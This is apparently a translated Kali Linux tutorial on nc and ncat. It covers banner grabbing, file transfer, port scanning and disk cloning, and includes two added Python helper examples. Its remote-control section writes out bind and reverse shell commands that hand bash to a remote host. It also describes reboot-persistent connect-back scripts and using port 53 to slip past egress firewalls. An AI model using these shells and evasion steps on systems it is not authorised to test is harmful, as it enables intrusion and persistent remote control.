Kali tutorial (7): basic tools (nc, ncat)

Common tools

Frequently used, powerful, and an indispensable helper for security practitioners.

Nc/ncat

nc is the Swiss army knife of network tools: small in size but powerful in what it can do.
It is cross-platform, with both Windows and Linux versions.
Things you can do with it:

  • telnet replacement / banner grabbing: nc is more capable than telnet
  • Transmit text: for example, it can be used as a chat tool
  • Transfer files / directories
  • Encrypted file transfer: by default, files are transferred unencrypted
  • Remote control / trojan
  • Encrypt all traffic
  • Streaming media services
  • Remote hard-drive cloning
1.NC——telnet/banner

1. Like telnet, nc can connect to a target port and send commands to the service behind it.
nc can act as a client or as a server. As a client, it connects to a service port on another host and lets you interact with that service by hand and see what it sends back.

Common syntax: nc -nv <ip> <port>
  e.g. nc -nv 1.1.1.1 80

nc -h  # shows how the options are used


-v: display detailed output about the connection
-n: do not resolve names; the argument must be an IP address. With -n a domain name is not resolved, so do not pass a domain name when using it.

Example 1: 163 server

As a client, connect to the pop3.163.com mail server.
1. Resolve the domain name to obtain its IP address.
2. Run the command.
pop3 is port 110, so the command is:

nc -vn 123.126.97.79 110

Analysis:
Running the command shows the first use of nc: after connecting to a server port, you see the banner the service presents. The connection shows that port 110 on that address is open and that it returned "Welcome to…". From that one line we can tell that the 163 mail server runs Coremail, i.e. its mail service is implemented with Coremail.

Analysis: The 163 SMTP server likewise returns a banner, which identifies a dedicated anti-spam gateway of the Coremail system.


Example 2: http server


2.NC——Transmit text information

For example, two hosts chatting.
For two hosts to exchange text, one of them must open a port and listen on it; the other connects to that port as a client.
A: nc -l -p <port>
B: nc -nv <ip> <port>
When the connection is closed at one end, both ends terminate at the same time.


This is well suited to remote digital forensics.

One principle of digital forensics: if a computer is suspected of being compromised, examine it while modifying the files on it as little as possible, or not at all, so that the evidence it holds is not destroyed.
-q <seconds>: after the command's input is exhausted, wait the given delay and then close the connection. If the connection does not close by itself, there is no way to tell whether the command has completed.

3.NC——remote control

nc can replace ssh for remote control only to a limited degree; it is not a full replacement.
It can provide control in either direction.
Think of it as something like QQ's remote desktop control.
**Note:** to control Windows from Kali, install nc on Windows; Windows users replace bash with cmd in the commands below.

Forward

The client obtains a shell on the server.

# server side:
A: nc -lp <port> -c bash   # once someone connects to me with nc, a bash shell is handed to them over the nc connection
# client side
B: nc -nv <server-ip> <port>

The files listed by B's ls on the left are the contents of VM A on the right: B is remotely controlling A and has obtained a shell on VM A.

Reverse

The server obtains a shell on the client.

# server side
A: nc -lp <port>
# client side
B: nc -vn <server-ip> <port> -c bash

When B types ls, pwd and other commands into its nc session, nothing appears on B's side; the output of those commands appears on A instead. A has now obtained B's shell.

In a typical deployment, B is a server placed in an IDC machine room to run services, and a firewall sits at the boundary of that machine room. The firewall will not open an unusual port, map it to the host and let outsiders connect to it; apart from the published service ports, all other inbound traffic from outside is filtered at the border firewall.
Against a junior network administrator: a forward connection is therefore impractical, and a reverse connection is used instead. The penetration tester's host A opens a port and listens, and a service startup script on B makes B connect to A's IP address every time B restarts and hand its shell to A. This is easy to achieve because such administrators do not restrict traffic from the inside out.
Against a network administrator with better security awareness: most outbound traffic may also be blocked. B must still be allowed some outbound ports, however; if port 53 is allowed, A can listen on port 53 and the border firewall will not filter that connection.
Against a network administrator who is very good at security: the intranet server group may run its own DNS server, so the business servers have no path from the internal network to the outside at all and sit entirely behind the firewall. That is genuinely hard to get past.

4.NC——NCAT

Everything nc does can also be done with ncat.
Disadvantages of nc:

  • All traffic nc sends is unencrypted; it has no encryption capability and is easy to sniff.
  • An open nc port can be used by anyone: nc has no authentication and cannot tell who is connecting.

ncat makes up for these shortcomings. It is shipped with nmap and is one of the tools in the nmap suite.


An example

Use ncat to encrypt the channel. Whether the data inside is plain text or anything else, anyone capturing packets sees only ciphertext, because the pipe itself is encrypted.

# server side
ncat -c bash --allow <client-ip> -vnl <port> --ssl
# client side
ncat -v <server-ip> <port> --ssl

The SSL fingerprint shown is different every time a connection is established.


The right-hand VM only allows the host with IP ending in 118 to connect, but the left-hand VM's IP ends in 119, so it gets an input/output error; the right-hand VM, which performs the check, reports that the connection is not allowed.

Note that nc's options differ between platforms and between versions of nc.

5.NC——Transfer files / directories

Transfer files:

# receiver opens the port
A: nc -lp <listen-port> > <file>      # '>' redirects whatever arrives on the listening port into the file
# sender
B: nc -nv <ip> <port> < <file> -q 1   # '<' feeds the file into nc's connection to the remote port

# sender opens the port
A: nc -lp <port> < <file> -q 1
# receiver
B: nc -nv <ip> <port> > <file>

Either the receiver opens the port and waits for someone to send a file, or the sender opens the port and waits for someone to fetch it.
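An added example, not code from the original post: a loopback stand-in for the receiver and sender commands above, written with Python sockets, that shows why the sender must close after EOF (the -q 1 step, otherwise the receiver never finishes) and lets both ends compare a sha256 digest, since nc itself gives no integrity check. The payload, file names and ephemeral port are constructed.

```python
import hashlib
import os
import socket
import tempfile
import threading

def receive_file(listen_sock, out_path):
    """Receiver side of 'nc -lp <port> > <file>': accept one connection and
    write everything that arrives until the peer closes; return the sha256."""
    conn, _ = listen_sock.accept()
    digest = hashlib.sha256()
    with conn, open(out_path, "wb") as f:
        while True:
            chunk = conn.recv(65536)
            if not chunk:  # EOF is only seen once the sender closes its side
                break
            f.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()

def send_file(host, port, in_path):
    """Sender side of 'nc -nv <ip> <port> < <file> -q 1': stream the file,
    then close the sending direction so the receiver sees EOF and exits."""
    digest = hashlib.sha256()
    with socket.create_connection((host, port)) as s, open(in_path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            s.sendall(chunk)
            digest.update(chunk)
        s.shutdown(socket.SHUT_WR)  # the -q step: without it the receiver hangs
    return digest.hexdigest()

def transfer_demo(payload):
    """Loopback transfer of a constructed payload: (tx_sha256, rx_sha256, bytes)."""
    tmp = tempfile.mkdtemp()
    src, dst = os.path.join(tmp, "src.bin"), os.path.join(tmp, "dst.bin")
    with open(src, "wb") as f:
        f.write(payload)
    ls = socket.socket()
    ls.bind(("127.0.0.1", 0))  # an ephemeral port stands in for <port>
    ls.listen(1)
    port = ls.getsockname()[1]
    result = {}
    t = threading.Thread(target=lambda: result.update(rx=receive_file(ls, dst)))
    t.start()
    tx = send_file("127.0.0.1", port, src)
    t.join()
    ls.close()
    with open(dst, "rb") as f:
        data = f.read()
    return tx, result["rx"], data
```

The same pattern applies to the directory transfer and the disk-cloning commands later on the page, which only change what is piped into and out of nc.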


Transfer a directory

A: tar -cvf - <directory>/ | nc -lp <port> -q 1   # the tar archive is written to stdout and piped into nc
B: nc -nv <ip> <port> | tar -xvf -               # unpack the received archive

Encrypted file transfer

# receiver opens the port
A: nc -lp <port> | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > <file>   # listen and decrypt what arrives into the file
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < <file> | nc -nv <receiver-ip> <port> -q 1   # encrypt the file on its way out

Insert picture description here
This is not nc's own encryption; it relies on the operating system's mcrypt command. Note that ECB mode leaks plaintext patterns, so a chained mode such as CBC is the better choice.
mcrypt is not installed in Kali by default; install it yourself:

apt-get install mcrypt   # install the mcrypt command
6.NC——Streaming media service
A: cat <file> | nc -lp <listen-port>                   # send the file to B as a stream
B: nc -nv <ip> <port> | mplayer -vo x11 -cache 3000 -  # feed the stream to the media player, which plays as data arrives; cache size 3000

mplayer is not installed by default and must be installed first.
No copy of the file is written locally.

7.NC——Port scan
nc -nvz <ip> 1-65535    # the port range can be changed
nc -nvzu <ip> 1-65535   # the port range can be changed

By default nc uses TCP, so the first command probes TCP ports; to probe UDP ports, use the second command.
No single scanner's results are guaranteed to be accurate. Scan with several methods so that the combined results are more reliable.
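An added example, not from the original post: a parser for the verbose open-port lines that different nc builds print (the nc.traditional style and the OpenBSD nc style), plus a comparison of two scans of the same host so that ports only one scan reports can be re-checked, as the paragraph above recommends. All sample lines are constructed.

```python
import re

# Constructed sample output of two verbose scans (nc -nvz ip 1-1024) of the
# same host, one in the nc.traditional line format and one in the OpenBSD nc
# format; the lines are made up for this example.
SCAN_TRADITIONAL = """\
(UNKNOWN) [10.0.0.5] 22 (ssh) open
(UNKNOWN) [10.0.0.5] 80 (http) open
(UNKNOWN) [10.0.0.5] 110 (pop3) open
"""
SCAN_OPENBSD = """\
Connection to 10.0.0.5 22 port [tcp/ssh] succeeded!
Connection to 10.0.0.5 80 port [tcp/http] succeeded!
Connection to 10.0.0.5 443 port [tcp/https] succeeded!
Connection to 10.0.0.5 53 port [udp/domain] succeeded!
"""

TRAD_RE = re.compile(r"^\S+ \[(?P<ip>[\d.]+)\] (?P<port>\d+) \([^)]*\) open$")
OBSD_RE = re.compile(r"^Connection to (?P<ip>[\d.]+) (?P<port>\d+) port "
                     r"\[(?P<proto>tcp|udp)/[^\]]*\] succeeded!$")

def parse_open_ports(text, default_proto="tcp"):
    """Return a set of (ip, proto, port) from either verbose format. The
    traditional format prints no protocol, so the caller states whether the
    scan was run with -u (udp) or not (tcp)."""
    found = set()
    for line in text.splitlines():
        m = TRAD_RE.match(line)
        if m:
            found.add((m["ip"], default_proto, int(m["port"])))
            continue
        m = OBSD_RE.match(line)
        if m:
            found.add((m["ip"], m["proto"], int(m["port"])))
    return found

def compare_scans(a, b):
    """Split two result sets into agreed / only_a / only_b; a port that only
    one scan reports is the one to re-check with another method."""
    return {"agreed": a & b, "only_a": a - b, "only_b": b - a}
```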

8.NC——Remote clone hard drive

For remote digital forensics, the target server's hard disk, or its memory, can be copied over the network.

# receiver opens the port
A: nc -lp <port> | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv <ip> <port> -q 1
Origin blog.csdn.net/weixin_43876557/article/details/104522343